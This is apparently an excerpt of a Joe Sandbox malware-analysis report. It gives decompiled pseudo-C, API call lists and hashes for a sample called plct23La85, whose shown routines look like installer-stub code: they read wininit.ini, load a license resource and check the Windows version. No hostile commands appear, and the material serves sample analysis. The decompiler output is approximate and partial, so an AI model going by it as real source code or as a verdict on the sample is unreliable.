                                                                                                                                                                                                      • Part of subcall function 00136285: GetLastError.KERNEL32(00135BBC), ref: 00136285
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(<None>,00000000), ref: 00133AD0
                                                                                                                                                                                                    • LocalFree.KERNEL32 ref: 00133B13
                                                                                                                                                                                                      • Part of subcall function 00136517: FindResourceA.KERNEL32(00130000,000007D6,00000005), ref: 0013652A
                                                                                                                                                                                                      • Part of subcall function 00136517: LoadResource.KERNEL32(00130000,00000000,?,?,00132EE8,00000000,001319E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00136538
                                                                                                                                                                                                      • Part of subcall function 00136517: DialogBoxIndirectParamA.USER32(00130000,00000000,00000547,001319E0,00000000), ref: 00136557
                                                                                                                                                                                                      • Part of subcall function 00136517: FreeResource.KERNEL32(00000000,?,?,00132EE8,00000000,001319E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00136560
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00133100,00000000,00000000), ref: 00133AF4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$LICENSE
                                                                                                                                                                                                    • API String ID: 2414642746-383193767
                                                                                                                                                                                                    • Opcode ID: 97aa223d7682203e096634a44809fdec2183ad2ea209fc034a7ad9c4bd0dd8cb
                                                                                                                                                                                                    • Instruction ID: ef93b91d26bc6837027905b63b5437ce271e97740c1c6f401224febed300364f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97aa223d7682203e096634a44809fdec2183ad2ea209fc034a7ad9c4bd0dd8cb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9119370300201ABD724AF76AC09E177EB9EFE5750F10453EB586EB9A1DFB988409668
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E001324E0(void* __ebx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t7;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				long _t26;
                                                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t20 = __ebx;
                                                                                                                                                                                                    				_t7 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                    				_t25 = 0x104;
                                                                                                                                                                                                    				_t26 = 0;
                                                                                                                                                                                                    				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    					E0013658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                    					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                    					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                    					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                    						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                    						_lclose(_t25);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00136CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x001324e0
                                                                                                                                                                                                    0x001324eb
                                                                                                                                                                                                    0x001324f2
                                                                                                                                                                                                    0x001324f7
                                                                                                                                                                                                    0x00132504
                                                                                                                                                                                                    0x0013250e
                                                                                                                                                                                                    0x0013251d
                                                                                                                                                                                                    0x0013252c
                                                                                                                                                                                                    0x00132541
                                                                                                                                                                                                    0x00132546
                                                                                                                                                                                                    0x00132553
                                                                                                                                                                                                    0x00132555
                                                                                                                                                                                                    0x00132555
                                                                                                                                                                                                    0x00132546
                                                                                                                                                                                                    0x0013256c

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00132506
                                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0013252C
                                                                                                                                                                                                    • _lopen.KERNEL32 ref: 0013253B
                                                                                                                                                                                                    • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0013254C
                                                                                                                                                                                                    • _lclose.KERNEL32(00000000), ref: 00132555
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                    • String ID: wininit.ini
                                                                                                                                                                                                    • API String ID: 3273605193-4206010578
                                                                                                                                                                                                    • Opcode ID: 276fe800d135a3e594c8e4f3544bc0ae327ea60ab2e61a73d1f6eadd7c933c34
                                                                                                                                                                                                    • Instruction ID: 73f12a66fd870ab7d6be5b9a9ff630f2b41368f61c421db5b0151c5b1ed6153b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 276fe800d135a3e594c8e4f3544bc0ae327ea60ab2e61a73d1f6eadd7c933c34
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6701D432600118ABC720AB65DC0CEDFBBBCEF95760F500165FA89D3190DF748E86CAA1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                    			E001336EE(CHAR* __ecx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                    				signed int _v420;
                                                                                                                                                                                                    				signed int _v424;
                                                                                                                                                                                                    				CHAR* _v428;
                                                                                                                                                                                                    				CHAR* _v432;
                                                                                                                                                                                                    				signed int _v436;
                                                                                                                                                                                                    				CHAR* _v440;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t72;
                                                                                                                                                                                                    				CHAR* _t77;
                                                                                                                                                                                                    				CHAR* _t91;
                                                                                                                                                                                                    				CHAR* _t94;
                                                                                                                                                                                                    				int _t97;
                                                                                                                                                                                                    				CHAR* _t98;
                                                                                                                                                                                                    				signed char _t99;
                                                                                                                                                                                                    				CHAR* _t104;
                                                                                                                                                                                                    				signed short _t107;
                                                                                                                                                                                                    				signed int _t109;
                                                                                                                                                                                                    				short _t113;
                                                                                                                                                                                                    				void* _t114;
                                                                                                                                                                                                    				signed char _t115;
                                                                                                                                                                                                    				short _t119;
                                                                                                                                                                                                    				CHAR* _t123;
                                                                                                                                                                                                    				CHAR* _t124;
                                                                                                                                                                                                    				CHAR* _t129;
                                                                                                                                                                                                    				signed int _t131;
                                                                                                                                                                                                    				signed int _t132;
                                                                                                                                                                                                    				CHAR* _t135;
                                                                                                                                                                                                    				CHAR* _t138;
                                                                                                                                                                                                    				signed int _t139;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t72 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                    				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                    				_t115 = __ecx;
                                                                                                                                                                                                    				_t135 = 0;
                                                                                                                                                                                                    				_v432 = __ecx;
                                                                                                                                                                                                    				_t138 = 0;
                                                                                                                                                                                                    				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                    					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                    					_t119 = 2;
                                                                                                                                                                                                    					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                    					__eflags = _t77;
                                                                                                                                                                                                    					if(_t77 == 0) {
                                                                                                                                                                                                    						_t119 = 0;
                                                                                                                                                                                                    						__eflags = 1;
                                                                                                                                                                                                    						 *0x138184 = 1;
                                                                                                                                                                                                    						 *0x138180 = 1;
                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                    						 *0x139a40 = _t119;
                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                    						__eflags =  *0x138a34 - _t138; // 0x0
                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                    							goto L66;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t115;
                                                                                                                                                                                                    						if(_t115 == 0) {
                                                                                                                                                                                                    							goto L66;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_v428 = _t135;
                                                                                                                                                                                                    						__eflags = _t119;
                                                                                                                                                                                                    						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                    						_t11 =  &_v420;
                                                                                                                                                                                                    						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                    						__eflags =  *_t11;
                                                                                                                                                                                                    						_v440 = _t115;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_v424 = _t135 * 0x18;
                                                                                                                                                                                                    							_v436 = E00132A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                    							_t91 = E00132A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                    							_t123 = _v436;
                                                                                                                                                                                                    							_t133 = 0x54d;
                                                                                                                                                                                                    							__eflags = _t123;
                                                                                                                                                                                                    							if(_t123 < 0) {
                                                                                                                                                                                                    								L32:
                                                                                                                                                                                                    								__eflags = _v420 - 1;
                                                                                                                                                                                                    								if(_v420 == 1) {
                                                                                                                                                                                                    									_t138 = 0x54c;
                                                                                                                                                                                                    									L36:
                                                                                                                                                                                                    									__eflags = _t138;
                                                                                                                                                                                                    									if(_t138 != 0) {
                                                                                                                                                                                                    										L40:
                                                                                                                                                                                                    										__eflags = _t138 - _t133;
                                                                                                                                                                                                    										if(_t138 == _t133) {
                                                                                                                                                                                                    											L30:
                                                                                                                                                                                                    											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                    											_t115 = 0;
                                                                                                                                                                                                    											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                    											__eflags = _t138 - _t133;
                                                                                                                                                                                                    											_t133 = _v432;
                                                                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                                                                    												_t124 = _v440;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                    												_v420 =  &_v268;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t124;
                                                                                                                                                                                                    											if(_t124 == 0) {
                                                                                                                                                                                                    												_t135 = _v436;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t99 = _t124[0x30];
                                                                                                                                                                                                    												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                    												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                    												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                    													asm("sbb ebx, ebx");
                                                                                                                                                                                                    													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_t115 = 0x104;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags =  *0x138a38 & 0x00000001;
                                                                                                                                                                                                    											if(( *0x138a38 & 0x00000001) != 0) {
                                                                                                                                                                                                    												L64:
                                                                                                                                                                                                    												_push(0);
                                                                                                                                                                                                    												_push(0x30);
                                                                                                                                                                                                    												_push(_v420);
                                                                                                                                                                                                    												_push("nst0dum");
                                                                                                                                                                                                    												goto L65;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												__eflags = _t135;
                                                                                                                                                                                                    												if(_t135 == 0) {
                                                                                                                                                                                                    													goto L64;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												__eflags =  *_t135;
                                                                                                                                                                                                    												if( *_t135 == 0) {
                                                                                                                                                                                                    													goto L64;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												MessageBeep(0);
                                                                                                                                                                                                    												_t94 = E0013681F(_t115);
                                                                                                                                                                                                    												__eflags = _t94;
                                                                                                                                                                                                    												if(_t94 == 0) {
                                                                                                                                                                                                    													L57:
                                                                                                                                                                                                    													0x180030 = 0x30;
                                                                                                                                                                                                    													L58:
                                                                                                                                                                                                    													_t97 = MessageBoxA(0, _t135, "nst0dum", 0x00180030 | _t115);
                                                                                                                                                                                                    													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                    													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                    														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                    														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                    															goto L66;
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    														__eflags = _t97 - 1;
                                                                                                                                                                                                    														L62:
                                                                                                                                                                                                    														if(__eflags == 0) {
                                                                                                                                                                                                    															_t138 = 0;
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    														goto L66;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													__eflags = _t97 - 6;
                                                                                                                                                                                                    													goto L62;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t98 = E001367C9(_t124, _t124);
                                                                                                                                                                                                    												__eflags = _t98;
                                                                                                                                                                                                    												if(_t98 == 0) {
                                                                                                                                                                                                    													goto L57;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                    										if(_t138 == 0x54c) {
                                                                                                                                                                                                    											goto L30;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags = _t138;
                                                                                                                                                                                                    										if(_t138 == 0) {
                                                                                                                                                                                                    											goto L66;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t135 = 0;
                                                                                                                                                                                                    										__eflags = 0;
                                                                                                                                                                                                    										goto L44;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									L37:
                                                                                                                                                                                                    									_t129 = _v432;
                                                                                                                                                                                                    									__eflags = _t129[0x7c];
                                                                                                                                                                                                    									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                    										goto L66;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t133 =  &_v268;
                                                                                                                                                                                                    									_t104 = E001328E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                    									__eflags = _t104;
                                                                                                                                                                                                    									if(_t104 != 0) {
                                                                                                                                                                                                    										goto L66;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t135 = _v428;
                                                                                                                                                                                                    									_t133 = 0x54d;
                                                                                                                                                                                                    									_t138 = 0x54d;
                                                                                                                                                                                                    									goto L40;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L33;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t91;
                                                                                                                                                                                                    							if(_t91 > 0) {
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t123;
                                                                                                                                                                                                    							if(_t123 != 0) {
                                                                                                                                                                                                    								__eflags = _t91;
                                                                                                                                                                                                    								if(_t91 != 0) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                    								L27:
                                                                                                                                                                                                    								if(__eflags <= 0) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								L28:
                                                                                                                                                                                                    								__eflags = _t135;
                                                                                                                                                                                                    								if(_t135 == 0) {
                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t138 = 0x54c;
                                                                                                                                                                                                    								goto L30;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t91;
                                                                                                                                                                                                    							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                    							if(_t91 != 0) {
                                                                                                                                                                                                    								_t131 = _v424;
                                                                                                                                                                                                    								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                    								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                    							_t109 = _v424;
                                                                                                                                                                                                    							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                    							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                    							goto L27;
                                                                                                                                                                                                    							L33:
                                                                                                                                                                                                    							_t135 =  &(_t135[1]);
                                                                                                                                                                                                    							_v428 = _t135;
                                                                                                                                                                                                    							_v420 = _t135;
                                                                                                                                                                                                    							__eflags = _t135 - 2;
                                                                                                                                                                                                    						} while (_t135 < 2);
                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__eflags = _t77 == 1;
                                                                                                                                                                                                    					if(_t77 == 1) {
                                                                                                                                                                                                    						 *0x139a40 = _t119;
                                                                                                                                                                                                    						 *0x138184 = 1;
                                                                                                                                                                                                    						 *0x138180 = 1;
                                                                                                                                                                                                    						__eflags = _t133 - 3;
                                                                                                                                                                                                    						if(_t133 > 3) {
                                                                                                                                                                                                    							__eflags = _t133 - 5;
                                                                                                                                                                                                    							if(_t133 < 5) {
                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t113 = 3;
                                                                                                                                                                                                    							_t119 = _t113;
                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t119 = 1;
                                                                                                                                                                                                    						_t114 = 3;
                                                                                                                                                                                                    						 *0x139a40 = 1;
                                                                                                                                                                                                    						__eflags = _t133 - _t114;
                                                                                                                                                                                                    						if(__eflags < 0) {
                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                    							 *0x138184 = _t135;
                                                                                                                                                                                                    							 *0x138180 = _t135;
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                    						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t138 = 0x4ca;
                                                                                                                                                                                                    					goto L44;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t138 = 0x4b4;
                                                                                                                                                                                                    					L44:
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					_push(0x10);
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					L65:
                                                                                                                                                                                                    					_t133 = _t138;
                                                                                                                                                                                                    					E001344B9(0, _t138);
                                                                                                                                                                                                    					L66:
                                                                                                                                                                                                    					return E00136CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}





































                                                                                                                                                                                                    0x001336f9
                                                                                                                                                                                                    0x00133700
                                                                                                                                                                                                    0x0013370c
                                                                                                                                                                                                    0x00133716
                                                                                                                                                                                                    0x00133718
                                                                                                                                                                                                    0x0013371b
                                                                                                                                                                                                    0x00133721
                                                                                                                                                                                                    0x0013372b
                                                                                                                                                                                                    0x0013373d
                                                                                                                                                                                                    0x00133745
                                                                                                                                                                                                    0x00133746
                                                                                                                                                                                                    0x00133746
                                                                                                                                                                                                    0x00133749
                                                                                                                                                                                                    0x001337ab
                                                                                                                                                                                                    0x001337ad
                                                                                                                                                                                                    0x001337ae
                                                                                                                                                                                                    0x001337b3
                                                                                                                                                                                                    0x001337b8
                                                                                                                                                                                                    0x001337b8
                                                                                                                                                                                                    0x001337bf
                                                                                                                                                                                                    0x001337bf
                                                                                                                                                                                                    0x001337c5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001337cb
                                                                                                                                                                                                    0x001337cd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001337d5
                                                                                                                                                                                                    0x001337db
                                                                                                                                                                                                    0x001337e8
                                                                                                                                                                                                    0x001337ea
                                                                                                                                                                                                    0x001337ea
                                                                                                                                                                                                    0x001337ea
                                                                                                                                                                                                    0x001337f0
                                                                                                                                                                                                    0x001337f6
                                                                                                                                                                                                    0x00133805
                                                                                                                                                                                                    0x00133817
                                                                                                                                                                                                    0x0013382b
                                                                                                                                                                                                    0x00133830
                                                                                                                                                                                                    0x00133836
                                                                                                                                                                                                    0x0013383b
                                                                                                                                                                                                    0x0013383d
                                                                                                                                                                                                    0x001338eb
                                                                                                                                                                                                    0x001338eb
                                                                                                                                                                                                    0x001338f2
                                                                                                                                                                                                    0x0013390c
                                                                                                                                                                                                    0x00133911
                                                                                                                                                                                                    0x00133911
                                                                                                                                                                                                    0x00133913
                                                                                                                                                                                                    0x0013394d
                                                                                                                                                                                                    0x0013394d
                                                                                                                                                                                                    0x0013394f
                                                                                                                                                                                                    0x001338a9
                                                                                                                                                                                                    0x001338a9
                                                                                                                                                                                                    0x001338b0
                                                                                                                                                                                                    0x001338b2
                                                                                                                                                                                                    0x001338b9
                                                                                                                                                                                                    0x001338bb
                                                                                                                                                                                                    0x001338c1
                                                                                                                                                                                                    0x00133975
                                                                                                                                                                                                    0x001338c7
                                                                                                                                                                                                    0x001338de
                                                                                                                                                                                                    0x001338e0
                                                                                                                                                                                                    0x001338e0
                                                                                                                                                                                                    0x0013397b
                                                                                                                                                                                                    0x0013397d
                                                                                                                                                                                                    0x001339a9
                                                                                                                                                                                                    0x0013397f
                                                                                                                                                                                                    0x00133982
                                                                                                                                                                                                    0x0013398b
                                                                                                                                                                                                    0x0013398d
                                                                                                                                                                                                    0x0013398f
                                                                                                                                                                                                    0x0013399f
                                                                                                                                                                                                    0x001339a1
                                                                                                                                                                                                    0x00133991
                                                                                                                                                                                                    0x00133991
                                                                                                                                                                                                    0x00133991
                                                                                                                                                                                                    0x0013398f
                                                                                                                                                                                                    0x001339af
                                                                                                                                                                                                    0x001339b6
                                                                                                                                                                                                    0x00133a0f
                                                                                                                                                                                                    0x00133a0f
                                                                                                                                                                                                    0x00133a11
                                                                                                                                                                                                    0x00133a13
                                                                                                                                                                                                    0x00133a19
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001339b8
                                                                                                                                                                                                    0x001339b8
                                                                                                                                                                                                    0x001339ba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001339bc
                                                                                                                                                                                                    0x001339bf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001339c3
                                                                                                                                                                                                    0x001339c9
                                                                                                                                                                                                    0x001339ce
                                                                                                                                                                                                    0x001339d0
                                                                                                                                                                                                    0x001339e3
                                                                                                                                                                                                    0x001339e5
                                                                                                                                                                                                    0x001339e6
                                                                                                                                                                                                    0x001339f1
                                                                                                                                                                                                    0x001339f7
                                                                                                                                                                                                    0x001339fa
                                                                                                                                                                                                    0x00133a01
                                                                                                                                                                                                    0x00133a04
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133a06
                                                                                                                                                                                                    0x00133a09
                                                                                                                                                                                                    0x00133a09
                                                                                                                                                                                                    0x00133a0b
                                                                                                                                                                                                    0x00133a0b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133a09
                                                                                                                                                                                                    0x001339fc
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001339fc
                                                                                                                                                                                                    0x001339d3
                                                                                                                                                                                                    0x001339d8
                                                                                                                                                                                                    0x001339da
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001339dc
                                                                                                                                                                                                    0x001339b6
                                                                                                                                                                                                    0x00133955
                                                                                                                                                                                                    0x0013395b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133961
                                                                                                                                                                                                    0x00133963
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133969
                                                                                                                                                                                                    0x00133969
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133969
                                                                                                                                                                                                    0x00133915
                                                                                                                                                                                                    0x00133915
                                                                                                                                                                                                    0x0013391b
                                                                                                                                                                                                    0x0013391f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013392d
                                                                                                                                                                                                    0x00133933
                                                                                                                                                                                                    0x00133938
                                                                                                                                                                                                    0x0013393a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133940
                                                                                                                                                                                                    0x00133946
                                                                                                                                                                                                    0x0013394b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013394b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001338f2
                                                                                                                                                                                                    0x00133843
                                                                                                                                                                                                    0x00133845
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013384b
                                                                                                                                                                                                    0x0013384d
                                                                                                                                                                                                    0x00133883
                                                                                                                                                                                                    0x00133885
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013389a
                                                                                                                                                                                                    0x0013389e
                                                                                                                                                                                                    0x0013389e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001338a0
                                                                                                                                                                                                    0x001338a0
                                                                                                                                                                                                    0x001338a2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001338a4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001338a4
                                                                                                                                                                                                    0x0013384f
                                                                                                                                                                                                    0x00133851
                                                                                                                                                                                                    0x00133857
                                                                                                                                                                                                    0x0013386e
                                                                                                                                                                                                    0x00133877
                                                                                                                                                                                                    0x0013387b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133881
                                                                                                                                                                                                    0x00133859
                                                                                                                                                                                                    0x0013385c
                                                                                                                                                                                                    0x00133862
                                                                                                                                                                                                    0x00133866
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133868
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001338f4
                                                                                                                                                                                                    0x001338f4
